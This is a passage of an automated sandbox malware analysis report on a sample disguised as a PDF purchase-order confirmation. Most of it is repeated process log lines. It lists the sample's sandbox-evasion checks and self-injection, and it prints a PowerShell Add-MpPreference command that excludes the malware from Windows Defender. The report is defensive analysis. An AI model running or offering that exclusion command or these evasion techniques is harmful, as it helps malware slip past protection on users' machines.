            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 8032, type: MEMORYSTR
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 8900000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 9900000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: 9B00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: AB00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6786Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2743Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe TID: 6760Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4640Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe TID: 5504Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,5_2_00403D74
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeThread delayed: delay time: 60000Jump to behavior
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000000.00000002.1276347382.00000000069F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: ADES_PO_Confirmation_20250307_pdf.bat.exe, 00000005.00000002.2490759003.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]5_2_0040317B
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,5_2_00402B7C
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeMemory written: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeProcess created: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
